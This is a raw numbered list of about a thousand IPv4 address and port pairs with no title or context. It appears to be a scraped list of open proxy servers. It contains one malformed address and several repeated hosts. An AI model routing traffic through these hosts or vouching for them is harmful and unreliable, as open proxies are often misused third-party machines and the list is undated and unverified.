50.206.25.111:80 19 | 5.252.161.48:8080 20 | 194.150.255.142:80 21 | 222.74.202.233:9999 22 | 182.79.103.122:80 23 | 80.244.230.86:8080 24 | 68.183.89.13:80 25 | 152.67.204.155:80 26 | 46.237.255.2:8080 27 | 47.91.44.217:8000 28 | 209.97.150.167:3128 29 | 68.185.57.66:80 30 | 18.159.210.15:9300 31 | 39.106.223.134:80 32 | 181.10.117.254:999 33 | 12.69.91.226:80 34 | 18.141.168.2:80 35 | 95.216.194.46:1081 36 | 79.175.164.30:3128 37 | 89.108.137.83:8080 38 | 95.31.119.210:31135 39 | 47.74.152.29:8888 40 | 158.69.52.218:9300 41 | 103.56.208.250:8080 42 | 95.208.208.237:8080 43 | 185.211.193.162:8080 44 | 132.148.16.47:8080 45 | 82.223.102.92:9443 46 | 46.5.252.56:8080 47 | 125.99.100.193:40390 48 | 213.230.90.106:3128 49 | 104.248.48.172:31583 50 | 79.143.225.152:60517 51 | 111.3.116.43:30001 52 | 192.119.203.124:48678 53 | 46.223.255.11:8080 54 | 222.74.202.239:8080 55 | 181.129.248.122:999 56 | 46.237.255.13:3128 57 | 94.73.205.1:55443 58 | 165.227.33.90:8081 59 | 186.101.48.195:83 60 | 182.84.145.57:3256 61 | 64.225.49.147:80 62 | 200.85.169.18:47548 63 | 45.188.78.29:999 64 | 80.87.194.27:8118 65 | 139.99.75.11:8080 66 | 213.230.97.169:3128 67 | 222.74.202.238:80 68 | 95.0.94.170:80 69 | 94.23.91.209:80 70 | 121.230.210.136:3256 71 | 180.97.87.63:80 72 | 183.247.199.126:30001 73 | 3.217.181.204:80 74 | 217.60.194.47:8080 75 | 165.227.163.91:3128 76 | 95.171.5.144:1256 77 | 39.108.88.42:80 78 | 168.138.14.176:80 79 | 46.4.96.137:8080 80 | 189.240.60.169:8080 81 | 116.203.155.45:8118 82 | 188.165.226.99:80 83 | 200.233.148.140:3128 84 | 41.222.209.9:808 85 | 149.172.255.7:8080 86 | 188.166.162.1:3128 87 | 217.8.51.203:8080 88 | 91.89.89.2:8080 89 | 102.129.249.120:3128 90 | 190.217.10.12:999 91 | 189.240.60.168:8080 92 | 190.71.97.106:999 93 | 190.210.8.69:8080 94 | 150.107.137.25:8080 95 | 116.68.170.190:8080 96 | 89.222.182.144:3128 97 | 27.191.60.198:3256 98 | 80.249.135.241:8080 99 | 116.202.228.164:3128 100 | 47.242.230.146:8888 101 | 176.235.83.112:8080 102 | 212.175.55.46:53281 103 | 64.124.38.141:8080 104 | 158.69.73.79:9300 105 | 139.224.49.207:8118 106 | 192.99.2.41:3128 107 | 91.217.42.2:8080 108 | 189.195.41.242:8080 109 | 1.10.141.220:54620 110 | 74.113.137.156:3128 111 | 101.132.189.87:9090 112 | 117.35.253.179:3000 113 | 167.71.5.83:8080 114 | 185.111.164.65:8080 115 | 185.58.17.4:8080 116 | 190.152.182.150:55443 117 | 118.117.188.174:3256 118 | 206.81.2.180:3128 119 | 92.252.190.126:8080 120 | 90.102.20.197:82 121 | 118.179.144.62:8080 122 | 191.102.251.133:8085 123 | 182.84.144.225:3256 124 | 110.74.203.250:8080 125 | 161.117.225.201:80 126 | 18.168.64.243:80 127 | 45.231.223.250:999 128 | 177.244.36.134:8080 129 | 146.59.199.43:80 130 | 95.221.53.227:8080 131 | 47.252.31.217:1088 132 | 176.9.119.170:3128 133 | 181.224.162.198:999 134 | 216.113.27.151:80 135 | 193.34.132.77:80 136 | 2.188.166.25:3128 137 | 182.253.244.139:80 138 | 89.218.5.110:37717 139 | 94.23.170.46:43567 140 | 188.0.138.11:8080 141 | 103.85.150.106:8080 142 | 222.74.202.242:8081 143 | 176.98.76.203:42991 144 | 103.35.132.189:82 145 | 186.67.67.10:8080 146 | 156.54.212.62:3128 147 | 95.154.104.147:44393 148 | 65.21.123.198:3128 149 | 88.198.50.103:3128 150 | 204.199.84.226:8090 151 | 158.69.53.98:9300 152 | 222.74.202.233:82 153 | 194.242.98.33:3128 154 | 103.109.59.242:53281 155 | 45.172.111.13:999 156 | 200.116.226.210:43049 157 | 8.208.103.213:1088 158 | 46.237.255.14:8080 159 | 218.7.171.91:3128 160 | 203.113.167.3:80 161 | 103.248.93.5:8080 162 | 158.177.253.24:80 163 | 52.74.18.115:80 164 | 143.255.52.102:31158 165 | 82.212.62.29:8080 166 | 222.74.202.240:80 167 | 82.212.62.18:3128 168 | 23.94.143.167:80 169 | 103.6.184.222:39241 170 | 177.67.155.182:3128 171 | 176.236.223.151:9090 172 | 95.0.206.19:8080 173 | 12.218.209.130:53281 174 | 118.117.188.141:3256 175 | 43.224.8.14:6666 176 | 186.86.247.169:39168 177 | 36.91.107.61:8080 178 | 103.240.168.138:6666 179 | 190.217.1.53:32192 180 | 92.50.155.218:8080 181 | 121.100.19.69:8080 182 | 93.183.214.121:8080 183 | 198.20.116.74:8080 184 | 193.226.199.106:9090 185 | 84.54.82.173:3128 186 | 166.130.79.200:80 187 | 103.76.12.42:80 188 | 95.67.48.234:8080 189 | 183.247.152.98:53281 190 | 47.57.101.76:8118 191 | 50.246.120.125:8080 192 | 103.16.12.141:8080 193 | 190.217.14.110:999 194 | 190.111.203.179:8080 195 | 52.220.29.125:443 196 | 103.124.89.216:8080 197 | 116.12.236.210:8080 198 | 168.170.27.143:8080 199 | 194.228.129.189:55472 200 | 111.43.79.98:8085 201 | 78.42.42.44:3128 202 | 219.152.50.167:3128 203 | 47.88.22.73:3128 204 | 193.110.83.82:8080 205 | 14.238.99.105:3128 206 | 107.178.9.186:8080 207 | 45.195.76.130:999 208 | 36.92.79.238:8080 209 | 137.184.51.253:80 210 | 37.49.127.234:8080 211 | 203.135.25.179:8080 212 | 176.214.97.55:1256 213 | 43.255.113.232:8080 214 | 191.243.218.249:53281 215 | 201.222.44.34:999 216 | 115.84.246.50:80 217 | 222.74.202.244:80 218 | 45.181.190.9:8090 219 | 152.0.63.113:999 220 | 154.16.63.16:8080 221 | 185.203.118.237:8888 222 | 114.232.255.113:8118 223 | 50.206.25.106:80 224 | 78.42.42.36:8080 225 | 189.50.13.30:8080 226 | 36.67.8.27:53281 227 | 110.78.112.198:8080 228 | 23.238.33.186:80 229 | 149.172.255.13:3128 230 | 112.78.170.27:8080 231 | 190.210.8.90:8080 232 | 1.224.161.58:8081 233 | 85.216.127.179:3128 234 | 36.91.88.166:8080 235 | 192.162.192.148:55443 236 | 112.78.170.251:8080 237 | 200.24.157.120:999 238 | 181.48.220.250:999 239 | 179.27.201.136:80 240 | 124.158.88.56:54555 241 | 202.158.15.146:55667 242 | 181.209.105.157:8080 243 | 201.184.53.179:999 244 | 13.112.197.90:8080 245 | 27.191.60.148:3256 246 | 37.238.132.158:54190 247 | 36.91.194.25:8080 248 | 136.228.141.154:80 249 | 103.235.199.93:42033 250 | 104.149.140.174:443 251 | 177.86.201.22:8080 252 | 212.95.180.50:53281 253 | 64.124.38.138:8080 254 | 109.254.11.9:9090 255 | 103.10.22.234:8080 256 | 36.92.196.141:8080 257 | 116.1.7.243:3256 258 | 144.48.112.42:8080 259 | 200.73.208.62:999 260 | 51.79.165.93:8080 261 | 103.111.137.226:8085 262 | 94.75.76.10:8080 263 | 103.161.164.113:8181 264 | 24.113.42.177:48678 265 | 105.213.116.8:53281 266 | 161.97.127.234:3000 267 | 43.250.126.1:9001 268 | 8.243.120.54:999 269 | 188.170.234.58:33877 270 | 84.44.2.2:8080 271 | 69.160.192.139:8080 272 | 134.0.63.134:8000 273 | 103.255.242.115:8080 274 | 2.32.128.70:3128 275 | 110.44.124.220:55443 276 | 103.81.212.192:83 277 | 202.14.80.2:3128 278 | 79.101.98.2:53281 279 | 79.101.67.154:8080 280 | 195.34.241.124:8080 281 | 222.74.202.233:81 282 | 41.191.226.86:55443 283 | 103.142.21.197:8080 284 | 36.95.24.49:8080 285 | 80.249.135.25:8080 286 | 79.143.87.134:9090 287 | 94.247.241.70:53640 288 | 36.37.177.186:8080 289 | 185.110.210.5:8080 290 | 91.202.72.105:8080 291 | 52.227.7.173:80 292 | 179.127.174.58:8080 293 | 202.166.207.195:8080 294 | 115.127.162.234:8080 295 | 165.22.218.125:3128 296 | 45.179.200.161:999 297 | 134.3.255.4:8080 298 | 176.9.75.42:3128 299 | 103.14.196.13:83 300 | 178.172.225.49:3128 301 | 187.190.255.76:999 302 | 41.254.52.188:8080 303 | 36.94.229.237:8080 304 | 222.74.202.232:9999 305 | 188.235.136.203:8080 306 | 5.16.0.180:8080 307 | 131.196.14.232:999 308 | 45.64.11.241:8080 309 | 159.203.61.169:3128 310 | 77.99.232.24:80 311 | 182.75.97.166:3127 312 | 65.21.252.86:3128 313 | 185.58.18.1:8080 314 | 115.74.213.139:8080 315 | 43.128.18.61:8080 316 | 187.189.211.214:999 317 | 71.219.6.127:55443 318 | 157.52.151.11:80 319 | 92.119.159.21:3128 320 | 195.225.230.50:8080 321 | 20.81.62.32:3128 322 | 118.173.242.189:8080 323 | 194.233.69.38:443 324 | 188.133.143.135:1256 325 | 103.81.214.205:82 326 | 46.237.255.5:8080 327 | 43.255.113.232:8084 328 | 5.56.133.225:7890 329 | 200.55.3.125:999 330 | 58.209.234.8:3389 331 | 114.55.95.18:3128 332 | 79.143.87.140:9090 333 | 171.97.16.242:8080 334 | 116.12.236.212:8080 335 | 45.130.99.18:8080 336 | 194.111.185.23:80 337 | 181.13.3.170:999 338 | 117.102.81.6:53281 339 | 189.199.94.206:999 340 | 150.136.37.217:80 341 | 123.139.56.238:9999 342 | 207.244.227.169:443 343 | 3.125.229.175:80 344 | 43.231.160.77:10809 345 | 178.205.254.106:8080 346 | 222.74.202.242:80 347 | 122.248.45.35:53281 348 | 40.127.201.29:80 349 | 200.54.249.179:999 350 | 64.124.38.139:8080 351 | 158.69.66.131:9300 352 | 170.246.85.9:50991 353 | 88.99.155.226:3128 354 | 52.140.230.28:3128 355 | 119.82.239.37:8080 356 | 120.194.55.139:6969 357 | 182.253.82.154:37242 358 | 168.228.150.5:47507 359 | 45.189.86.138:8080 360 | 8.210.18.83:8000 361 | 58.251.94.56:6666 362 | 45.153.229.6:80 363 | 222.74.202.240:8081 364 | 209.91.184.156:80 365 | 88.255.234.198:80 366 | 115.110.207.120:3128 367 | 46.146.209.132:61309 368 | 191.252.194.87:80 369 | 194.44.15.222:8081 370 | 217.182.13.57:3128 371 | 36.89.99.98:44030 372 | 1.179.183.73:50178 373 | 103.106.112.18:1234 374 | 119.3.36.232:3128 375 | 150.129.148.88:35101 376 | 185.23.128.181:3128 377 | 200.46.65.66:8080 378 | 136.228.141.154:8080 379 | 200.54.194.12:53281 380 | 190.116.36.133:8080 381 | 5.44.54.103:8080 382 | 27.42.168.46:55481 383 | 103.230.211.29:8080 384 | 05.252.161.48:8080 385 | 58.221.193.74:8888 386 | 187.188.16.14:999 387 | 182.84.144.235:3256 388 | 45.118.166.114:8080 389 | 14.192.150.210:3128 390 | 31.204.180.44:53281 391 | 191.241.48.132:3128 392 | 121.40.108.76:80 393 | 54.38.78.108:3128 394 | 82.114.93.210:8080 395 | 88.146.218.75:12222 396 | 45.150.190.61:8080 397 | 81.18.34.98:42535 398 | 36.67.158.49:65301 399 | 119.167.66.22:8081 400 | 148.247.225.81:808 401 | 91.194.239.122:8080 402 | 121.232.148.50:3256 403 | 124.6.129.129:80 404 | 114.32.84.229:80 405 | 138.121.113.182:999 406 | 204.16.1.169:82 407 | 51.159.24.172:3167 408 | 106.14.132.57:8089 409 | 89.24.76.185:32842 410 | 85.198.250.135:3128 411 | 114.134.188.124:55667 412 | 188.133.139.219:1256 413 | 45.228.77.247:999 414 | 181.205.22.170:7654 415 | 103.83.118.10:55443 416 | 118.185.38.153:35101 417 | 190.2.209.138:999 418 | 18.132.18.81:80 419 | 27.116.51.181:6666 420 | 186.148.191.226:999 421 | 217.8.51.198:8080 422 | 43.255.217.201:1337 423 | 1.179.144.41:8080 424 | 119.90.38.51:3129 425 | 91.89.89.4:8080 426 | 182.84.144.41:3256 427 | 176.235.131.229:9090 428 | 134.249.114.53:8080 429 | 118.117.188.17:3256 430 | 171.97.131.193:8080 431 | 58.215.201.98:56566 432 | 181.129.138.114:30838 433 | 209.97.129.0:3128 434 | 202.162.214.243:80 435 | 80.87.213.45:8080 436 | 181.129.183.19:53281 437 | 161.35.52.72:80 438 | 5.252.161.48:3128 439 | 187.216.90.46:53281 440 | 43.224.10.32:6666 441 | 42.117.2.104:3128 442 | 101.99.94.189:80 443 | 177.152.97.98:8083 444 | 193.242.151.43:8080 445 | 46.223.255.13:3128 446 | 87.117.97.73:8080 447 | 64.124.38.142:8080 448 | 113.96.219.105:4002 449 | 103.26.130.156:55443 450 | 37.18.100.185:8080 451 | 47.107.211.142:3228 452 | 104.45.128.122:80 453 | 219.152.171.72:16887 454 | 82.146.42.187:80 455 | 93.157.12.248:8080 456 | 124.106.224.5:8080 457 | 183.88.232.207:8080 458 | 47.243.177.149:80 459 | 111.23.16.250:3128 460 | 182.84.145.120:3256 461 | 91.77.162.117:8080 462 | 183.88.210.77:8080 463 | 194.233.74.68:8080 464 | 165.16.46.193:8080 465 | 152.169.106.145:8080 466 | 46.101.49.62:80 467 | 92.118.191.156:6667 468 | 221.125.138.189:8380 469 | 134.3.255.4:3128 470 | 1.116.123.226:808 471 | 183.129.141.57:888 472 | 222.94.35.89:9999 473 | 103.139.219.110:82 474 | 177.66.112.221:57945 475 | 47.107.211.177:3228 476 | 120.27.214.78:3128 477 | 201.59.214.82:8080 478 | 183.91.0.120:3128 479 | 221.125.138.189:8193 480 | 85.62.10.91:8080 481 | 14.141.146.99:80 482 | 218.86.87.171:31661 483 | 182.84.144.86:3256 484 | 122.15.131.65:57873 485 | 14.97.2.108:80 486 | 221.131.158.246:8888 487 | 201.71.2.160:999 488 | 1.186.40.177:54754 489 | 95.0.6.228:8080 490 | 182.84.145.21:3256 491 | 222.165.205.154:8089 492 | 109.232.106.236:49565 493 | 218.59.193.14:38640 494 | 91.209.11.132:80 495 | 91.121.154.159:80 496 | 82.156.171.147:3128 497 | 175.101.15.34:83 498 | 36.92.70.209:8080 499 | 213.6.28.93:8080 500 | 198.199.86.11:8080 501 | 213.74.253.190:9090 502 | 177.86.18.124:8080 503 | 82.99.217.18:8080 504 | 176.236.98.163:9090 505 | 62.33.207.202:3128 506 | 222.74.202.229:8081 507 | 222.74.202.242:9999 508 | 106.52.236.117:808 509 | 103.241.227.98:6666 510 | 202.152.51.44:8080 511 | 88.99.209.230:3128 512 | 78.47.104.35:3128 513 | 103.56.208.89:8080 514 | 36.92.180.240:8080 515 | 190.8.43.35:999 516 | 129.205.210.90:65205 517 | 202.21.38.138:80 518 | 43.225.23.131:80 519 | 105.112.134.209:8080 520 | 103.35.135.30:83 521 | 185.3.213.8:8080 522 | 35.206.150.95:3128 523 | 65.38.21.118:80 524 | 91.146.224.225:53281 525 | 131.161.60.1:8083 526 | 160.19.240.58:8080 527 | 202.69.38.82:8080 528 | 125.62.213.18:83 529 | 190.216.107.254:999 530 | 134.209.29.120:8080 531 | 103.78.170.10:83 532 | 36.94.8.23:8080 533 | 66.70.229.130:43567 534 | 47.119.168.135:8888 535 | 128.199.202.122:3128 536 | 222.74.202.231:8080 537 | 143.0.226.116:3128 538 | 83.167.203.174:50128 539 | 202.153.41.214:84 540 | 221.125.138.189:8197 541 | 179.189.226.186:8080 542 | 82.212.62.25:8080 543 | 132.226.23.217:8888 544 | 101.51.139.179:8080 545 | 181.209.97.77:999 546 | 125.99.120.166:40390 547 | 41.170.12.92:37444 548 | 37.157.165.115:8080 549 | 164.77.131.172:999 550 | 95.140.117.225:6666 551 | 190.121.157.142:999 552 | 45.225.95.163:999 553 | 120.29.242.237:3128 554 | 161.117.89.36:8888 555 | 185.104.252.10:9090 556 | 181.143.17.37:8080 557 | 43.255.113.232:80 558 | 36.66.171.243:8080 559 | 209.91.184.153:80 560 | 213.6.65.30:8080 561 | 222.74.202.233:80 562 | 212.22.169.22:8085 563 | 154.127.36.138:8080 564 | 102.129.249.120:8080 565 | 103.85.150.106:8000 566 | 72.47.152.224:55443 567 | 93.91.112.247:41258 568 | 46.223.255.6:3128 569 | 176.101.89.226:33470 570 | 189.240.60.171:8080 571 | 85.90.211.73:8080 572 | 190.103.86.254:8080 573 | 132.226.16.58:8000 574 | 196.1.95.117:80 575 | 77.237.73.48:3128 576 | 80.93.212.44:3155 577 | 170.238.10.194:999 578 | 109.193.195.5:8080 579 | 5.16.0.174:8080 580 | 203.112.76.193:8080 581 | 89.111.104.109:41258 582 | 47.112.162.202:3228 583 | 103.20.188.5:8181 584 | 27.191.60.185:3256 585 | 191.96.42.80:3128 586 | 82.165.252.82:80 587 | 187.44.1.41:8080 588 | 47.98.179.39:8080 589 | 41.204.87.90:8080 590 | 46.237.255.11:8080 591 | 188.133.153.161:1256 592 | 47.75.90.57:80 593 | 94.181.48.71:1256 594 | 159.65.171.69:80 595 | 50.206.25.104:80 596 | 181.115.67.3:999 597 | 36.94.23.154:9999 598 | 134.122.93.93:8080 599 | 20.86.232.217:80 600 | 45.156.31.19:9090 601 | 179.49.210.100:999 602 | 139.198.179.174:3128 603 | 101.200.49.180:8118 604 | 82.114.119.81:8080 605 | 43.224.10.27:6666 606 | 103.37.141.69:80 607 | 36.95.142.26:8080 608 | 182.23.79.162:39902 609 | 104.248.90.212:80 610 | 195.187.63.42:8080 611 | 182.23.54.146:58519 612 | 138.117.84.105:999 613 | 96.9.69.164:53281 614 | 36.95.27.209:80 615 | 203.202.246.34:8080 616 | 209.45.4.163:999 617 | 203.189.137.137:8080 618 | 180.183.229.249:8080 619 | 181.13.14.8:8081 620 | 212.56.218.42:8080 621 | 219.152.171.80:16887 622 | 182.160.124.26:8081 623 | 103.112.35.221:8080 624 | 128.199.202.122:8080 625 | 223.25.99.114:9999 626 | 177.91.96.44:6666 627 | 144.91.85.172:3128 628 | 114.4.240.130:8080 629 | 181.176.161.39:999 630 | 118.97.47.249:55443 631 | 217.195.204.85:3161 632 | 182.253.0.44:808 633 | 41.73.5.190:80 634 | 190.5.94.74:999 635 | 109.195.69.211:8090 636 | 103.240.77.98:30093 637 | 59.37.18.243:3128 638 | 41.86.251.62:8080 639 | 79.174.12.173:3128 640 | 89.109.252.129:8080 641 | 200.24.135.59:999 642 | 182.23.211.108:80 643 | 65.182.5.212:8080 644 | 181.209.97.75:999 645 | 49.145.121.30:8080 646 | 134.209.29.120:3128 647 | 37.18.25.63:8080 648 | 94.16.15.100:3128 649 | 182.253.82.155:37242 650 | 182.84.145.204:3256 651 | 46.4.96.137:3128 652 | 5.189.184.6:80 653 | 139.60.226.225:8080 654 | 36.91.45.10:51672 655 | 202.164.152.229:8080 656 | 122.154.69.17:8082 657 | 193.34.95.110:8080 658 | 201.132.105.30:8080 659 | 78.42.42.39:3128 660 | 103.213.213.14:83 661 | 41.90.245.23:8080 662 | 91.143.218.146:3128 663 | 190.122.185.170:999 664 | 170.238.10.129:999 665 | 202.150.158.170:8080 666 | 37.26.136.181:52271 667 | 1.186.45.170:80 668 | 206.189.146.13:8080 669 | 192.99.239.215:8080 670 | 121.8.146.99:8060 671 | 189.45.199.37:20183 672 | 94.76.137.2:8080 673 | 94.143.48.145:8080 674 | 103.80.83.153:8080 675 | 62.201.217.194:8080 676 | 190.183.246.27:8080 677 | 160.16.104.81:3128 678 | 109.200.155.194:8080 679 | 47.90.132.228:3128 680 | 47.242.200.148:80 681 | 88.198.24.108:3128 682 | 103.139.242.181:83 683 | 91.149.203.12:3128 684 | 113.20.31.24:80 685 | 178.212.196.177:9999 686 | 182.79.103.125:80 687 | 45.229.32.244:999 688 | 82.99.232.18:58689 689 | 61.145.212.31:3128 690 | 158.69.64.142:9300 691 | 50.235.149.74:8080 692 | 177.37.16.104:8080 693 | 45.181.207.1:8080 694 | 47.100.231.6:3128 695 | 91.93.73.231:7070 696 | 203.236.203.208:80 697 | 196.214.185.87:80 698 | 190.211.81.210:3128 699 | 103.100.96.174:55443 700 | 223.99.2.59:63000 701 | 193.14.162.9:80 702 | 78.81.245.153:8080 703 | 203.110.240.156:80 704 | 81.71.122.208:3000 705 | 38.123.207.249:999 706 | 221.5.80.66:3128 707 | 43.224.10.37:6666 708 | 58.56.149.198:53281 709 | 197.210.217.66:34808 710 | 209.45.3.99:999 711 | 182.253.181.10:8080 712 | 109.193.195.14:8080 713 | 46.98.99.128:8080 714 | 118.163.94.3:80 715 | 117.102.81.5:53281 716 | 195.225.48.113:58302 717 | 181.225.54.59:8080 718 | 175.101.18.225:83 719 | 94.101.73.39:8080 720 | 103.122.63.17:8080 721 | 163.172.157.7:80 722 | 95.174.102.131:53281 723 | 46.161.192.5:8080 724 | 185.61.152.137:8080 725 | 185.209.69.147:8080 726 | 202.29.237.212:3128 727 | 81.21.82.109:8080 728 | 182.84.144.207:3256 729 | 40.91.94.165:3128 730 | 121.232.148.215:3256 731 | 91.142.12.34:8081 732 | 159.89.221.73:3128 733 | 47.254.90.125:81 734 | 183.247.207.225:30001 735 | 46.5.252.55:8080 736 | 34.192.253.65:80 737 | 217.195.203.28:3130 738 | 114.110.21.121:50464 739 | 43.224.10.36:6666 740 | 141.101.196.159:3128 741 | 45.189.58.65:9090 742 | 201.220.112.98:999 743 | 91.217.42.3:8080 744 | 45.156.31.0:9090 745 | 102.68.134.133:6666 746 | 103.105.68.9:8080 747 | 185.44.232.30:53281 748 | 138.68.60.8:8080 749 | 177.200.238.44:999 750 | 190.112.219.57:999 751 | 102.176.160.84:8080 752 | 144.76.42.215:8118 753 | 103.114.10.6:8080 754 | 36.95.23.89:8080 755 | 46.223.255.4:3128 756 | 138.185.190.46:8080 757 | 91.200.185.197:80 758 | 95.208.208.232:8080 759 | 80.240.202.218:8080 760 | 118.99.74.17:8080 761 | 201.49.72.226:8080 762 | 182.72.150.242:8080 763 | 176.236.99.215:8080 764 | 54.193.134.2:20096 765 | 139.59.1.14:8080 766 | 68.208.51.61:8080 767 | 103.98.131.194:8081 768 | 116.197.154.65:8080 769 | 109.193.195.10:8080 770 | 116.203.67.172:3128 771 | 1.1.220.100:8080 772 | 179.189.125.222:8080 773 | 8.208.91.118:3128 774 | 190.109.169.41:53281 775 | 103.199.157.169:40049 776 | 190.106.116.106:9090 777 | 31.179.224.42:44438 778 | 190.113.40.205:999 779 | 112.14.47.6:52024 780 | 45.189.252.23:999 781 | 219.128.76.3:8080 782 | 5.16.0.97:1256 783 | 36.89.89.167:8888 784 | 185.42.60.242:8080 785 | 49.231.174.182:80 786 | 115.74.254.226:8080 787 | 112.6.117.178:8085 788 | 188.234.248.18:8080 789 | 166.159.90.56:53281 790 | 200.39.62.158:9991 791 | 182.253.60.170:8083 792 | 200.111.182.6:443 793 | 182.253.207.36:8080 794 | 222.74.202.240:8080 795 | 180.149.235.39:8080 796 | 159.203.61.169:8080 797 | 213.230.121.63:8080 798 | 222.74.202.234:8081 799 | 45.250.226.14:3128 800 | 85.196.133.98:8080 801 | 212.200.246.24:80 802 | 143.255.52.67:31158 803 | 185.76.215.54:80 804 | 91.121.134.85:9999 805 | 61.153.251.150:22222 806 | 222.252.156.61:62694 807 | 88.214.11.199:8081 808 | 186.97.239.98:8080 809 | 43.255.113.232:8085 810 | 103.92.213.253:43399 811 | 86.121.126.153:8083 812 | 27.191.60.152:3256 813 | 103.159.46.2:83 814 | 185.153.180.222:8080 815 | 109.200.159.29:8080 816 | 211.110.60.22:3128 817 | 95.67.9.186:8080 818 | 81.134.57.82:3128 819 | 188.72.51.245:8080 820 | 122.15.211.125:80 821 | 188.133.153.187:8081 822 | 125.73.131.137:9091 823 | 222.74.202.243:8080 824 | 131.161.131.1:45005 825 | 203.112.223.126:8080 826 | 201.249.61.60:8080 827 | 185.200.37.188:9090 828 | 103.155.156.10:8080 829 | 64.124.38.125:8080 830 | 121.43.190.89:3128 831 | 82.114.101.86:1256 832 | 172.105.40.232:80 833 | 80.75.13.203:80 834 | 217.60.194.43:8080 835 | 103.122.202.2:8080 836 | 94.23.172.208:43567 837 | 194.233.73.107:443 838 | 103.250.153.242:31382 839 | 198.199.86.11:3128 840 | 128.68.63.80:55443 841 | 45.11.6.117:53281 842 | 188.68.52.45:80 843 | 104.248.48.252:31583 844 | 170.79.12.72:9090 845 | 122.155.165.191:3128 846 | 103.135.6.10:63123 847 | 36.95.21.92:8080 848 | 94.74.132.129:808 849 | 185.202.165.1:53281 850 | 139.162.20.252:8080 851 | 190.121.131.6:8080 852 | 200.125.168.150:999 853 | 175.101.19.225:83 854 | 103.70.130.134:83 855 | 36.92.83.178:8080 856 | 82.114.118.142:1256 857 | 45.116.229.183:8080 858 | 139.255.123.4:8080 859 | 89.208.35.81:3128 860 | 89.218.58.122:8080 861 | 93.48.169.74:3128 862 | 36.67.73.129:8080 863 | 197.231.198.172:42461 864 | 203.76.114.197:8080 865 | 182.84.144.69:3256 866 | 200.24.135.58:999 867 | 41.73.5.190:8080 868 | 189.71.131.247:9999 869 | 194.233.73.104:443 870 | 50.241.148.97:8080 871 | 111.51.67.223:8080 872 | 202.152.12.202:8080 873 | 184.82.128.211:8080 874 | 91.207.238.107:56288 875 | 103.135.0.145:8080 876 | 117.94.222.10:3256 877 | 81.23.114.198:8080 878 | 204.199.108.98:8080 879 | 103.119.144.4:55443 880 | 119.93.235.205:41731 881 | 202.147.207.253:38646 882 | 176.214.35.58:1256 883 | 185.21.67.212:8080 884 | 89.28.53.42:8080 885 | 190.85.115.78:3128 886 | 51.75.206.209:80 887 | 139.99.74.79:8080 888 | 188.133.152.25:1256 889 | 134.3.255.7:3128 890 | 103.212.92.253:48434 891 | 41.220.114.154:8080 892 | 103.70.79.3:8080 893 | 217.196.20.150:8080 894 | 177.229.201.194:9991 895 | 46.223.255.2:8080 896 | 95.140.27.135:58901 897 | 185.238.239.28:8090 898 | 45.127.246.98:8080 899 | 160.202.9.53:8080 900 | 103.195.72.1:84 901 | 118.70.12.171:53281 902 | 31.220.183.217:53281 903 | 183.247.211.151:30001 904 | 212.126.96.154:8080 905 | 47.57.188.208:80 906 | 94.182.209.82:8080 907 | 47.52.159.153:8081 908 | 213.6.227.38:45730 909 | 62.68.24.143:8118 910 | 177.11.26.208:8083 911 | 187.95.114.125:3128 912 | 162.55.182.109:443 913 | 85.173.165.36:46330 914 | 181.188.203.169:999 915 | 222.74.202.243:80 916 | 182.79.103.121:80 917 | 83.12.149.202:8080 918 | 31.131.67.14:8080 919 | 117.141.155.241:53281 920 | 190.110.204.194:999 921 | 103.70.79.2:8080 922 | 101.255.72.171:443 923 | 8.208.81.46:1088 924 | 202.142.158.114:8080 925 | 194.233.69.90:443 926 | 109.200.156.102:8080 927 | 103.80.237.211:3888 928 | 182.84.144.166:3256 929 | 95.208.208.233:8080 930 | 103.146.222.2:83 931 | 187.44.1.172:8080 932 | 77.236.243.39:1256 933 | 223.100.215.26:8080 934 | 155.0.181.254:43496 935 | 91.93.48.252:9090 936 | 189.203.10.213:999 937 | 179.191.245.58:3128 938 | 95.215.48.93:8080 939 | 96.2.161.239:80 940 | 176.101.221.119:8080 941 | 51.79.142.43:8080 942 | 222.74.202.231:80 943 | 194.213.43.166:60530 944 | 119.96.109.233:8888 945 | 27.111.45.18:55443 946 | 37.49.127.234:3128 947 | 88.255.102.102:8080 948 | 8.210.210.60:80 949 | 202.165.47.90:55443 950 | 91.240.208.142:3128 951 | 176.9.75.42:8080 952 | 190.216.115.117:8080 953 | 200.215.171.238:8080 954 | 41.75.85.22:8080 955 | 45.122.246.10:8080 956 | 76.80.19.107:8080 957 | 185.230.105.243:8080 958 | 91.93.118.3:8090 959 | 189.50.4.226:8080 960 | 151.22.181.213:8080 961 | 201.20.110.54:55443 962 | 103.19.56.159:3127 963 | 190.1.201.58:8080 964 | 43.255.113.232:8083 965 | 149.172.255.6:8080 966 | 183.88.0.205:8080 967 | 88.198.24.108:8080 968 | 203.188.251.226:8080 969 | 43.224.10.13:6666 970 | 139.99.73.249:8080 971 | 69.197.181.202:3128 972 | 80.244.229.55:1256 973 | 206.189.86.178:80 974 | 47.90.126.138:9090 975 | 158.140.190.242:55443 976 | 190.14.213.2:8080 977 | 68.188.63.149:8080 978 | 122.15.211.126:80 979 | 91.144.139.3:3128 980 | 203.66.65.6:3128 981 | 179.1.82.18:999 982 | 84.22.61.74:8080 983 | 222.165.218.130:8080 984 | 188.169.38.111:8080 985 | 186.16.206.218:999 986 | 221.236.16.197:8118 987 | 183.195.106.118:8118 988 | 47.254.90.125:8080 989 | 95.47.119.247:8080 990 | 85.216.127.187:3128 991 | 138.94.255.227:80 992 | 3.121.94.146:80 993 | 103.203.65.2:45692 994 | 173.208.140.122:3128 995 | 190.107.22.255:999 996 | 80.244.236.205:1256 997 | 187.191.25.151:999 998 | 222.74.202.243:8081 999 | 47.254.94.236:1088 1000 | 222.74.202.245:80 1001 | 182.84.144.100:3256 1002 | 186.67.26.178:999 1003 | 167.71.230.124:8080 1004 | 200.69.80.241:8080 1005 | 45.65.58.10:8080 1006 | 91.93.48.251:9090 1007 | 103.19.56.152:3127 1008 | 94.56.27.42:3128 1009 | 218.75.102.198:8000 1010 | 68.188.59.198:80 1011 | 47.88.7.115:3129 1012 | 117.102.67.210:8070 1013 | 77.236.248.237:8080 1014 | 177.11.84.254:8080 1015 | 202.169.47.108:8080 1016 | 54.93.108.168:9300 1017 | 154.236.162.59:8888 1018 | 36.95.65.99:8019 1019 | 175.106.10.226:51630 1020 | 36.92.22.70:8080 1021 | 194.233.73.108:443 1022 | 103.216.82.43:6666 1023 | 27.116.51.186:6666 1024 | 88.255.234.193:80 1025 | 217.195.203.29:3131 1026 | 96.94.136.60:9999 1027 | 176.214.97.13:8081 1028 | 175.101.81.251:80 1029 | 91.89.89.9:8080 1030 | 118.101.57.61:80 1031 